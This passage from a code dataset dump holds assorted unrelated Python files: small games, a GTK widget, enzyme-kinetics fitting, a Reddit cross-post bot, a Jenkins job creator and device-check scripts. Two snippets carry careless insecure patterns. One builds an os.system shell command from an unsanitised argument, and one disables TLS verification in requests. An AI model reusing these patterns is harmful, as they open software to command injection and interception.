'e']\nprint(reverse(letras))\n","sub_path":"funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"159903672","text":"import random\r\n\r\nshapes = {1 : \"rock\", 2 : \"paper\", 3 : \"scissors\"}\r\nwhile True:\r\n You = int(input(\"Please input your number here and 1-rock 2-paper 3-scissors: \"))\r\n if You in shapes:\r\n break\r\n print(\"Please input 1 or 2 or 3\") \r\nComputer = random.randint(1, 3)\r\nprint('The shapes of you is: ', shapes[You])\r\nprint('The shapes of computer is: ', shapes[Computer])\r\nif (You == 1) and (Computer == 3) or (You == 2) and (Computer == 1) or (You == 3) and (Computer == 2):\r\n print(\"You are the winner!\")\r\nelif You == Computer:\r\n print(\"You're tied to the computer\")\r\nelse:\r\n print(\"Computer is the winner!\")","sub_path":"Python/JuSt MiNi GaMe/rock paper scissors.py","file_name":"rock paper scissors.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"532542629","text":"# Copyright: 2007-2013, Sebastian Billaudelle \n# 2010-2013, Kristoffer Kleine \n\n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation; either version 2.1 of the License, or\n# (at your option) any later version.\n\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\nfrom gi.repository import GObject as gobject, Gtk as gtk\nimport cairo\nimport time\nimport math\n\nCURVE_LINEAR = lambda x: x\nCURVE_SINE = lambda x: math.sin(math.pi / 2 * x)\n\nFRAMERATE = 30.0\n\n\nclass CompositeBin(gtk.Fixed):\n \"\"\" A subclass of `GtkFixed` enabling composition of child widgets to the parent widget. \"\"\"\n\n def __init__(self):\n\n self.alpha = 1\n self.children = []\n\n gtk.Fixed.__init__(self)\n\n self.connect('realize', self.realize_cb)\n\n\n def realize_cb(self, widget):\n self.get_parent().connect_after('draw', self.draw_cb)\n\n\n def draw_cb(self, widget, ctx):\n\n ctx.set_operator(cairo.OPERATOR_OVER)\n\n #ctx.rectangle(*event.area)\n ctx.clip()\n\n for child in self.children:\n alloc = child.get_allocation()\n ctx.move_to(alloc.x, alloc.y)\n #ctx.set_source_pixmap(child.window, alloc.x, alloc.y)\n ctx.paint()\n\n return False\n\n\n def add(self, child, x, y):\n \"\"\"\n Add a widget.\n\n :param child: A `GtkWidget` to add to the `CompositedBin`.\n \"\"\"\n\n self.children.append(child)\n child.connect('realize', self.child_realize_cb)\n self.put(child, x, y)\n\n\n def remove(self, child):\n\n gtk.Fixed.remove(self, child)\n self.children.remove(child)\n\n\n def child_realize_cb(self, widget):\n try:\n widget.window.set_composited(True)\n except:\n pass\n\n\n def raise_child(self, child):\n\n child.window.raise_()\n self.children.remove(child)\n self.children.insert(len(self.children), child)\n self.window.invalidate_rect(child.allocation, True)\n\n\nclass Timeline(gobject.GObject):\n\n __gtype_name__ = 'Timeline'\n __gsignals__ = {\n 'update': (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_FLOAT,)),\n 'completed': (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, ())\n }\n\n def __init__(self, duration, curve):\n\n gobject.GObject.__init__(self)\n\n self.duration = duration\n self.curve = curve\n\n self._states = []\n self._stopped = False\n\n\n def run(self):\n\n n_frames = (self.duration / 1000.0) * FRAMERATE\n\n while len(self._states) <= n_frames:\n self._states.append(self.curve(len(self._states) * (1.0 / n_frames)))\n self._states.reverse()\n\n gobject.timeout_add(int(self.duration / n_frames), self.update)\n\n\n def stop(self):\n self._stopped = True\n\n\n def update(self):\n \n if self._stopped:\n self.emit('completed')\n return False\n\n self.emit('update', self._states.pop())\n if len(self._states) == 0:\n self.emit('completed')\n return False\n return True\n","sub_path":"cream/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"496164559","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 23 10:55:15 2018\n\n@author: botond\n\"\"\"\n\nfrom scipy.optimize import curve_fit\nimport numpy as np\nfrom scipy.special import lambertw\nimport matplotlib.pyplot as plt\nimport time\n\ndef S_test(t,S0,E0,kf,kr,kcat,t0):\n Km = (kr+kcat)/kf\n V = kcat * E0\n S = Km * np.real(lambertw(S0/(Km) * np.exp((S0-V*(t-t0))/(Km))))\n return S\n\ndef product_test(t,S0,E0,kf,kr,kcat,t0):\n if t < t0:\n return 0\n Km = (kr+kcat)/kf\n return abs((S0 - S_test(t,S0,E0,kf,kr,kcat,t0) - E0*S_test(t,S0,E0,kf,kr,kcat,t0)/(Km + S_test(t,S0,E0,kf,kr,kcat,t0)) * (1 - np.exp(-((Km + S_test(t,S0,E0,kf,kr,kcat,t0)) * kf * (t-t0))))))\n\ndef S(t,S0,Km,V,t0):\n S = Km * np.real(lambertw(S0/(Km) * np.exp((S0-V*(t-t0))/(Km))))\n return S\n\ndef product(t,Km,V,t0):\n return (S0 - S(t,S0,Km,V,t0))\n\n\n#parameters:\nS0=1000; E0=1; kf=0.01; kr=0.05; kcat=5; t0=-20\n\nstarttime = time.time()\n\nestimates = []\nnum = 1000\nnoisevalues = [0,5,10,25]\n\nKm = (kr + kcat)/kf\nV = E0*kcat\n\noripars = [S0, Km, V, t0] #original parameters for evaluation (in part 3)\n\nfor noise in noisevalues:\n for i in range(num):\n \n #setup t values:\n test_t = np.array([t for t in range(0,1200,20)])\n \n #setup P values:\n test_P = np.array([product_test(t,S0,E0,kf,kr,kcat,t0) for t in test_t])\n \n #add noise to P values:\n test_P = [np.random.normal(loc=p, scale = p**(1/2) * noise/100*3) for p in test_P]\n \n #fit:\n popt, pcov = curve_fit(product, test_t, test_P, bounds=([0,0,-80], [3*oripars[1],3*oripars[2],0]), method=\"trf\")\n \n #append external list\n estpars = [S0, popt[0], popt[1], popt[2]]\n estimates.append(estpars)\n\nelapsedtime = time.time()- starttime\nprint('\\n','elapsed time = ',float(format(elapsedtime,'.4f')),' s',sep='')\n\nestimates = np.array(estimates)\nparameterkeys = ['S0','Km','V','t0']\n#%%\n#figures by species\nfor j in [j for j in range(len(parameterkeys)) if j != 0]: #omit S0\n fig, axs = plt.subplots(2, 2)\n fig.suptitle(parameterkeys[j], fontsize=16)\n for i in range(len(noisevalues)):\n a = int(i/2)\n b = i%2\n \n avg = np.average(estimates[i*num+1:(i+1)*num+1,j])\n stddev = np.std(estimates[i*num+1:(i+1)*num+1,j], ddof=1)\n error = abs((oripars[j] - avg)/oripars[j]) * 100\n axs[a,b].annotate('original parameter: {0:.2f}\\naverage: {1:.2f}\\nstandard deviation: {2:.2f}\\nrelative error: {3:.2f}{4}'.format(oripars[j],avg,stddev,error, \"%\"), xy=(0.7,0.6), xycoords='axes fraction')\n axs[a,b].axvline(oripars[j], color='r', linestyle='dashed', linewidth=2, label=\"original value\")\n \n axs[a,b].hist(estimates[i*num+1:(i+1)*num+1,j], bins=100, range=[min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])], label=\"estimated values\")\n axs[a,b].set_title('noise = {}%'.format(noisevalues[i]))\n axs[a,b].legend()\n axs[a,b].set_xlabel(parameterkeys[j])\n axs[a,b].set_ylabel('occurance')\n axs[a,b].set_xlim([min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])])\n \n#%%\n#figures by noise level\nfor i in range(len(noisevalues)):\n fig, axs = plt.subplots(2, 2)\n fig.suptitle('noise = {}%'.format(noisevalues[i]), fontsize=16)\n for j in range(len(parameterkeys)):\n a = int(j/2)\n b = j%2\n \n avg = np.average(estimates[i*num+1:(i+1)*num+1,j])\n stddev = np.std(estimates[i*num+1:(i+1)*num+1,j], ddof=1)\n error = abs((oripars[j] - avg)/oripars[j]) * 100\n axs[a,b].annotate('original parameter: {0:.2f}\\naverage: {1:.2f}\\nstandard deviation: {2:.2f}\\nrelative error: {3:.2f}{4}'.format(oripars[j],avg,stddev,error, \"%\"), xy=(0.7,0.6), xycoords='axes fraction')\n axs[a,b].axvline(oripars[j], color='r', linestyle='dashed', linewidth=2, label=\"original value\")\n \n axs[a,b].hist(estimates[i*num+1:(i+1)*num+1,j], bins=100, range=[min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])], label=\"estimated values\")\n axs[a,b].set_title(parameterkeys[j],fontsize=16)\n axs[a,b].legend()\n# axs[a,b].set_xlabel(parameterkeys[j])\n# axs[a,b].set_ylabel('occurance')\n axs[a,b].set_xlim([min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])])\n ","sub_path":"Histograms_noisyPvalues.py","file_name":"Histograms_noisyPvalues.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322675504","text":"import gensim\nfrom sklearn.metrics import classification_report\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport oseti\nimport random\nfrom transformers import BertForSequenceClassification\nimport fasttext\nimport gensim\n# model = fasttext.load_model('resources/fasttext_model/model_e20.bin')\n# model = gensim.models.KeyedVectors.load_word2vec_format('hoge.bin')\n\n\ndef tes_oseti():\n analyzer = oseti.Analyzer()\n score = analyzer.analyze_detail('このイヤホンは重低音が良いです')\n print(score)\n\n\ndef test_tfidf(corpus: list):\n vectorizer = TfidfVectorizer()\n X = vectorizer.fit_transform(corpus)\n X = X.toarray()\n idf = dict(zip(vectorizer.get_feature_names(), vectorizer.idf_))\n df_idf = pd.DataFrame(columns=['idf']).from_dict(\n dict(idf), orient='index')\n df_idf.columns = ['idf']\n print(df_idf.sort_values(\"idf\", ascending=False).head(10).T)\n\n # df_tfidf = pd.DataFrame(X.toarray(), columns=vectorizer.get_feature_names())\n # print(df_tfidf)\n\n\ndef rename_df_col():\n df = pd.DataFrame({'A_a': [1, 2, 3], 'B_b': [1, 2, 3], 'C_c': [1, 2, 3]})\n df.rename(columns=lambda x: x.split('_')[1], inplace=True)\n # def columns(x): return {x.split('_')[0]: x.split('_')[1]}\n # print(columns(df.columns.values))\n print(df)\n\n\ndef extract_num():\n li = [round(random.random(), 1) for i in range(10)]\n # df = pd.DataFrame(li, columns=['f*ck'])\n # print(df)\n # df = df[abs(df['f*ck']) > 0.9]\n # print(df)\n # print(li)\n # li = [i if i >= 0.5 else -i for i in li if i > 0.2]\n # print(li)\n print(abs(li))\n\n\ndef gen_report(decimals: int = 6):\n epoch = 5\n prefix = ''\n df = pd.read_csv(\n f'my_pretrained_models/results/undersampling/model{prefix}_e{epoch}.csv')\n y_pred = df['pred_label'].values\n y_true = df['true_label'].values\n report = classification_report(y_true, y_pred, output_dict=True)\n df = pd.DataFrame(report).round(decimals)\n print(df)\n df.to_csv(\n f'my_pretrained_models/reports/undersampling/classification_report{prefix}_e{epoch}.csv')\n\n\ndef test_enclosure():\n x = []\n\n def closure(hoge: str = None):\n if hoge:\n nonlocal x\n x.append(hoge)\n if hoge is None:\n return x\n return closure\n\n\nif __name__ == \"__main__\":\n gen_report()\n # # model.vecをload\n # model = gensim.models.KeyedVectors.load_word2vec_format(\n # 'hoge.vec', binary=False)\n\n # # バイナリファイルとして保存\n # model.save_word2vec_format(\n # \"hoge_fixed.bin\", binary=True)\n # print(model.most_similar('イヤホン'))\n pass\n","sub_path":"testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"592382529","text":"#!/usr/bin/python3\n\nimport datetime\n\n\ndef age_calc(age):\n now = datetime.datetime.now()\n nage = age + (2035 - now.year)\n print (\"You will be %d at 2035\" % (nage))\n return 0\n\nage = 101\n\nwhile age > 100: \n age = int(input(\"What is your age?\\n\"))\n age_calc(age)\n","sub_path":"2035.py","file_name":"2035.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425526830","text":"\"\"\"Quick utility to run the current script from Blender\"\"\"\nimport subprocess\nimport inspect\nimport sys\nimport os\nfrom ..utils.blender_setup.blender_locator import get_blender_path\nfrom ..file.tempfiles import create_temp_file, cleanup_temp_files as cleanup\nfrom shutil import copyfile\n\ndef _copy_over_script(filepath:str) -> str:\n\t\"\"\"Copies over a python script to a tempfile, returning the path.\n\tRemoves certain lines so it can run in blender\"\"\"\n\tremove_lines_containing = ['.run_this_script']\n\tnew_lines = []\n\twith open(filepath, 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\tif not any([s in line for s in remove_lines_containing]):\n\t\t\t\tnew_lines.append(line)\n\n\tnew_filepath = create_temp_file(ext='.py')\n\twith open(new_filepath, 'w') as f:\n\t\tf.writelines(new_lines)\n\n\treturn new_filepath\n\n\n\ndef run_this_script(debug:bool=False):\n\t\"\"\"Run the script in which this function is called from Blender.\n\n\tWill also place a copy of the script inside Blender.\n\n\t:param debug: If True, open a Blender instance after all code is executed, otherwise run in background\"\"\"\n\n\trunning_in_blender = 'bpy' in sys.modules\n\n\tcaller_path = inspect.stack()[1].filename # path of script that called this function\n\n\tif not running_in_blender: # if blender is not running this script\n\n\t\tcaller_dir = os.path.dirname(caller_path)\n\t\tenv = os.environ.copy()\n\t\tenv['PYTHONPATH'] = caller_dir + os.pathsep + env.get('PYTHONPATH', '')\n\n\t\tblender_path = get_blender_path()\n\n\t\tcommands = [blender_path] + \\\n\t\t\t['--background'] * (not debug) + \\\n\t\t\t['--python', caller_path]\n\n\t\tsubprocess.call(commands, env=env)\n\n\t\tcleanup() # cleanup temp files\n\t\tsys.exit() # exit the script once blender is finished\n\n\telse:\n\t\t# blender is running this script\n\t\tif debug:\n\t\t\t# load the script into blender for viewing\n\t\t\timport bpy\n\t\t\tfrom ..utils import layout\n\n\t\t\tcaller_path = bpy.path.abspath(caller_path)\n\t\t\tscript_path = _copy_over_script(caller_path)\n\n\t\t\ttext_block = bpy.data.texts.load(script_path)\n\n\t\t\tlayout.change_area_to('DOPESHEET_EDITOR', 'TEXT_EDITOR')\n\t\t\tlayout.get_area('TEXT_EDITOR').spaces[0].text = text_block","sub_path":"blendersynth/run/run_this_script.py","file_name":"run_this_script.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"624986912","text":"#!/usr/bin/python3\n#elias de jesus moraes\n\n\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ntry:\n\t\n\tstring=sys.argv[1]\n\tcmd = \"echo -n \"+string+\" | xxd -ps | sed 's/[[:xdigit:]]\\{2\\}/\\\\\\\\x&/g'\"\n\tos.system(cmd)\nexcept IndexError:\n\tstring = input(\"\\nDigite a String desejada->\\n\")\n\t\n","sub_path":"sn3.py","file_name":"sn3.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"510828884","text":"\"\"\"\nGiven a number of parentheses (open and closed), find\nthe number of possible valid parentheses combinations.\n\nex. 3 parentheses, 5 combinations\n()()()\n()(())\n(())()\n(()())\n((()))\n\nO(n) time-complexity (if memoized), O(2^n) space-complexity\n\nThe solution works like this: if we use an open parentheses,\nthen a close parentheses is available to use to close out\nthe new open parentheses. From there, we can either add\non another open parentheses or close out the parentheses.\nGiven these two situations, we can recursively get the combinations.\n\nIf we ever have no more open parenthesis, then that's one combination,\nno matter the number of close parenthesis we have.\n\"\"\"\ndef paren_combo(num_parens):\n def paren_combo_helper(num_open_paren, num_close_paren):\n if num_open_paren == 0:\n return 1\n\n num_combo = 0\n # Use an open paren, so that means we can use a close paren\n num_combo += paren_combo_helper(num_open_paren - 1, num_close_paren + 1)\n # We have a close paren, lets use it\n if num_close_paren > 0:\n num_combo += paren_combo_helper(num_open_paren, num_close_paren - 1)\n\n return num_combo\n\n return paren_combo_helper(num_parens, 0)","sub_path":"dp/parencombo.py","file_name":"parencombo.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"330780494","text":"import praw\nimport os\nimport re\nfrom praw.errors import RateLimitExceeded, APIException\nfrom requests import HTTPError\nfrom requests.exceptions import ReadTimeout\n\n#Import credentials and log in to reddit account\ntry:\n from config_bot import *\nexcept ImportError:\n print (\"No config file found. Please supply a file named config_bot.py containing \"\n \"REDDIT_USERNAME and REDDIT_PASS strings\")\n exit(1)\n\nuser_agent = \"XPost Linker for Reddit 1.0 by /u/beeano\"\nr = praw.Reddit(user_agent = user_agent)\nr.login(REDDIT_USERNAME, REDDIT_PASS)\n\n#Check for list of posts already replied to, creating it if needed\nif not os.path.isfile(\"replied_posts.txt\"):\n replied_posts = []\nelse:\n with open(\"replied_posts.txt\", \"r\") as f:\n replied_posts = f.read()\n replied_posts = replied_posts.split(\"\\n\")\n \n\nsubreddit = r.get_subreddit(\"all\")\n\n#Check newest 2000 submissions in /r/all for a title containing 'xpost'\nfor submission in subreddit.get_new(limit=2000):\n if (re.search(\"xpost\", submission.title, re.IGNORECASE) or re.search(\"x-post\", submission.title, re.IGNORECASE)\n or re.search(\"crosspost\", submission.title, re.IGNORECASE)):\n #Check not already replied to post\n if submission.id not in replied_posts:\n split_title = submission.title.split(\" \")\n links = []\n #Formulate links from title and append to list of links\n for word in split_title:\n link = \"\"\n if word.startswith(\"r/\"):\n link = \"/\" + word\n else:\n if word.startswith(\"/r/\"):\n link = word\n link = link.strip(\"]),}:.\")\n if link:\n links.append(link)\n \n if links:\n #Iterate backwards to prevent items being skipped due to deletion\n for link in links[-1::-1]:\n #Remove link if malformed\n if ']' in link or ')' in link:\n print(\"Malformed link\")\n links.remove(link) \n #Remove link if xpost link is the same as the submission's subreddit\n if link[3:] == submission.subreddit.display_name:\n print(\"Xpost link and current subreddit are identical\")\n links.remove(link) \n #Remove link if xpost link already present in post body\n if re.search(link, submission.selftext, re.IGNORECASE):\n print(\"Xpost link already present in post body\") \n links.remove(link)\n #Remove link if xpost link is already present in comments\n submission_comments = praw.helpers.flatten_tree(submission.comments)\n already_posted = False\n for comment in submission_comments:\n if re.search(link, str(comment), re.IGNORECASE):\n already_posted = True\n if already_posted: \n print(\"Xpost Link already present in comments\")\n links.remove(link)\n\n #Attempt to retrieve direct link to original submission\n if links:\n original_link = \"\"\n #Only search first subreddit if x-posted from multiple subreddits\n original_sub = r.get_subreddit(links[0][3:])\n #If not a self post, search original sub for matching posted link\n if not submission.is_self:\n content = submission.url \n for post in original_sub.get_new(limit=1000):\n if not post.is_self:\n if post.url == content:\n original_link = post.permalink\n break\n #If self post, search original sub for matching post body - must be identical to match\n else:\n content = submission.selftext\n for post in original_sub.get_new(limit=1000):\n if post.is_self:\n if post.selftext == content:\n original_link = post.permalink\n break\n \n \n if links:\n #Attempt to post links as comment\n try:\n print(\"Replying to submission: \" + submission.id)\n replied_posts.append(submission.id) \n comment = \"XPost Subreddit Link: \"\n for link in links:\n comment += link + \" \"\n if not original_link:\n submission.add_comment(comment)\n #Print both the subreddit link, and direct link to original post if found\n else:\n submission.add_comment(comment + \"\\n\\nOriginal post: \" + original_link)\n except (RateLimitExceeded, APIException, HTTPError, ReadTimeout) as ex:\n print(ex)\n else:\n print(\"Already Replied to submission: \" + submission.id)\n\n#Prevent replied posts list growing too large and slowing searches\nif len(replied_posts) > 200:\n del replied_posts[:100] \n\n#Write updated replied posts list to file\nreplied_posts = filter(None, replied_posts) \nwith open(\"replied_posts.txt\", \"w\") as f:\n for post_ID in replied_posts:\n f.write(post_ID + \"\\n\")\n \n","sub_path":"XPostBot.py","file_name":"XPostBot.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"620198148","text":"from random import choices\nnum = [0,1,2,3,4,5,6,7,8,9]\ncod = [444]\ncod.insert(0, 0)\n\ndef gen_number():\n choose = choices(num, k=6)\n num1 = (cod + choose)\n replced = str(num1).replace(',', '')\n joined = replced.replace(' ', '')\n print(joined)\n\ngen_number()","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"358816242","text":"import tango\nimport time\n\nTIMEOUT=60\ndatabase = tango.Database()\nfailed = 1000\nstart_time = time.time()\nprint(\"TANGO waiting start\")\nwhile failed > 0:\n elapsed_time = time.time() - start_time\n if elapsed_time > TIMEOUT:\n print(\"Devices not working: exiting tango wait with failure\")\n exit(1)\n failed = 0\n instance_list = database.get_device_exported(\"*\")\n for instance in instance_list.value_string:\n try:\n dev = tango.DeviceProxy(instance)\n ping=dev.ping()\n print(\"Got ping (\"+str(ping)+\") working for dev \" + str(instance))\n except:\n failed = failed + 1\n print(\"Got exception for dev \" + str(instance))\nelapsed_time = time.time() - start_time\nprint(\"TANGO waiting: all devices working in \" + str(int(elapsed_time)) + \"ss.\")\n","sub_path":"scripts/wait_ping_devices.py","file_name":"wait_ping_devices.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486324131","text":"import sys\nimport ROOT\nfrom ROOT import ertool\nfrom seltool.algoviewer import view,getViewer\n\n#\n# Make my fake data input\n#\n\n# My toy data maker instance\ndata_maker=ertool.ToyDataMaker()\n# Make 2 fake tracks\nmy_shower1=data_maker.MakeShower(100,1,100, 40,40,40, 11)\nmy_shower2=data_maker.MakeShower(100,0,100, 20,20,20, 11)\n# Fake ID\nmyid=ROOT.std.pair(\"size_t\",\"string\")()\n\n#\n# Configure ERTool\n#\n\n# My ERTool manager\nmgr=ertool.Manager()\n# Add algorithm\nmgr.AddAlgo(ertool.ERAlgoToy())\n# Add my algorithm's config file\nmgr.AddCfgFile('dummy.cfg')\n\n#\n# Run it\n#\nmgr.Initialize()\n\n# Fake \"event\" 1\nmgr.ClearData()\nmgr.Add(my_shower1,myid)\nmgr.Add(my_shower2,myid)\nmgr.Process()\n\n#\n# View event\n#\n\n# Instantiate viewer\nviewer = getViewer(\"Reco\")\n# Call view function to draw on the viewer\nview( viewer, mgr.EventData(), mgr.ParticleGraph() )\n# Wait for a user's \"hit-enter\"\nsys.stdin.readline()\n# Finalize\nmgr.Finalize()\n","sub_path":"UserDev/SelectionTool/ERTool/Dummies/ToyViewer.py","file_name":"ToyViewer.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"258713786","text":"import re\n\n# Helper functions\ndef numeric_type(val):\n return isinstance(val,int) or isinstance(val, float)\n\ndef numeric_string(val):\n float_re = re.compile(r\"^\\d*[.]?\\d*$\")\n return isinstance(val, str) and float_re.match(val) is not None\n\ndef extract_numeric_type(val):\n assert numeric_string(val)\n if val.isdigit():\n return int(val)\n elif \".\" in val:\n return float(val)\n\n####\n\n# Convert to Python 3.7 data class\nclass Person:\n def __init__(self, name, age=5):\n self.name = name\n self.age = age\n \np1 = Person(\"John Doe\", 5)\n\nattr_vals = {\n 'name': getattr(p1, 'name'),\n 'age' : getattr(p1, 'age'),\n 'test': \"5.\"\n}\n\ntotal = 0\nfor val in attr_vals.values():\n if numeric_type(val):\n total += val\n else:\n is_num_str = numeric_string(val)\n total += extract_numeric_type(val) if is_num_str else 0\ntotal","sub_path":"scripts/dummy_script_1.py","file_name":"dummy_script_1.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"247310595","text":"# ref: https://leetcode.com/problems/product-of-array-except-self/\n# need to speed up and use less memory\n\nclass Solution(object):\n def validBounds(self,bound, length):\n if bound < 0 or bound >= length:\n return False\n return True\n \n def generateResult(self,nums,right_list,left_list):\n length = len(right_list)\n result = []\n \n for i,ele in enumerate(nums):\n left, right = i-1, i+1\n if not(self.validBounds(left,length)):\n left = 1\n else:\n left = left_list[left]\n if not(self.validBounds(right,length)):\n right = 1\n else:\n right = right_list[right]\n result.append(left*right)\n \n return result\n \n \n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n # without division, meaning that we would need partial products from the left and right of the array\n left, running_product = [], 1\n for ele in nums:\n running_product *= ele\n left.append(running_product)\n right, running_product = [], 1\n \n for ele in nums[::-1]:\n running_product *= ele\n right.insert(0,running_product)\n \n return self.generateResult(nums,right,left)\n \n ","sub_path":"Array/ProductOfArrayExceptSelf.py","file_name":"ProductOfArrayExceptSelf.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"37632206","text":"# coding=utf-8\nfrom st2client.client import Client\nfrom base import BaseJiraAction\nfrom common_lib import *\nfrom jenkins_lib import *\nfrom git_lib import *\nfrom github_lib import *\nimport json\nimport requests\nimport base64\nimport sys\nimport re\n\nreload(sys)\n\nsys.setdefaultencoding('utf-8')\n\n\nclass CDCreationAction(BaseJiraAction):\n def run(self, issue_key):\n issue = self._client.issue(issue_key)\n client = Client(base_url='http://localhost')\n jenkins_password = client.keys.get_by_name(name='jenkins_secret', decrypt=True)\n jenkins_username = self.config[\"jenkins_user\"]\n jenkins_url = self.config[\"jenkins_url\"]\n git_token = client.keys.get_by_name(name='git_api_token', decrypt=True)\n github_token = client.keys.get_by_name(name='github_api_token', decrypt=True)\n domain = self.config['git_domain']\n github_domain = self.config['github_domain']\n git_project_id = self.config['git_test_project_id']\n job_list = []\n\n try:\n # check group or organization exists\n group_or_organization = issue.raw['fields']['']\n git_handle = git_operation(domain, git_token.value)\n if git_handle.check_group_exists(group_or_organization):\n template_name = \"apim_swagger_template.xml\"\n else :\n github_handle = github_operation(github_domain,github_token.value)\n if github_handle.check_organization_exists(group_or_organization):\n template_name = \"apim_swagger_template_github.xml\"\n else:\n raise Exception(\"no such group/organization\")\n\n # get template\n if template_name:\n template = self.get_cd_template(domain, git_project_id, git_token.value,\n \"cicd_template/%s\" % (template_name,), \"master\")\n if template is None :\n raise Exception(\"Cannot get CD template\")\n\n # check view exists\n jenkins_handle = jenkins_operation(jenkins_url, jenkins_username, jenkins_password.value)\n view_name = group_or_organization\n if not jenkins_handle.check_view_exist(view_name) :\n jenkins_handle.add_view(view_name)\n job_list.append(\"add view: %s\"%view_name)\n\n # check job exists\n job_name = 'apim-swagger-upload'\n cd_job_name = \"-\".join([view_name, job_name]).replace(\"_\", \"-\").replace(\"--\", \"-\")\n all_jobs = jenkins_handle.get_all_jobs()\n job_str = \",\".join(all_jobs)\n pattern = \"(%s)\" % (cd_job_name.replace(\"-\", \"(-|_)\"),)\n matchObj = re.search(pattern, job_str)\n if matchObj:\n raise Exception(\"cd job exists\")\n\n # create job\n apim_env = \"\"\n eureka_service_id = \"\"\n platform = \"\"\n product_name = \"\"\n path = \"%s/%s\"%(view_name,job_name)\n config_xml = self.create_backend_cd_xml(template, path, apim_env, eureka_service_id, platform, product_name)\n jenkins_handle.create_job(job_name, config_xml)\n jenkins_handle.add_job_to_view(view_name, job_name)\n job_list.append(\"/\".join([view_name, \"job\", job_name]))\n\n\n except Exception as e:\n print(e)\n return False, repr(e)\n return True, \",\".join(job_list)\n\n def get_cd_template(self, domain, git_project_id, git_token, file_path, branch):\n try:\n get_file_url = '%s/api/v4/projects/%s/repository/files/%s?private_token=%s&ref=%s' \\\n % (domain, git_project_id, file_path.replace('/', '%2F'), git_token, branch)\n get_file_res = requests.get(get_file_url, verify=False)\n print(get_file_res)\n file_info = self.analyze_unicode(get_file_res.text)\n file_content = base64.b64decode(file_info['content'])\n return file_content\n except Exception as e:\n print(e)\n return None\n\n def analyze_unicode(self, text):\n json_str = json.dumps(text)\n json_result = json.loads(json_str).encode('utf-8')\n json_result = json.loads(json_result)\n return json_result\n\n\n\n\n def create_backend_cd_xml(self, template,path,apim_env, eureka_service_id,platform,product_name):\n template = template.replace(\"APIM_ENV\", apim_env).replace(\"EUREKA_SERVICE_ID\", eureka_service_id).replace(\"PLATFORM\", platform).replace(\"PRODUCT_NAME\", product_name)\n template = template.replace(\"JENKINS_FILE\",\"%s/Jenkinsfile\"%(path)).replace(\"{group name or org}/{jenkins job name}/Jenkinsfile\",\"\")\n # env_str = \"\"\n # for i in env:\n # env_str = env_str + \"%s\\n\" % (i[\"value\"])\n # template = template.replace(\"$ENV$\", env_str)\n return template\n","sub_path":"pg_code/task2-pgsrepack-SSA-47/actions/swagger_cd_creation_action.py","file_name":"swagger_cd_creation_action.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"306419229","text":"\"\"\"\n\tCollection of sorting algorithms\n\"\"\"\n\ndef bubblesort(l):\n\t\"\"\"\n\tSorts a list using a bubblesort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tfor i in range(len(l)):\n\t\tfor k in range(len(l)-1, i -1):\n\t\t\tif l[k] < 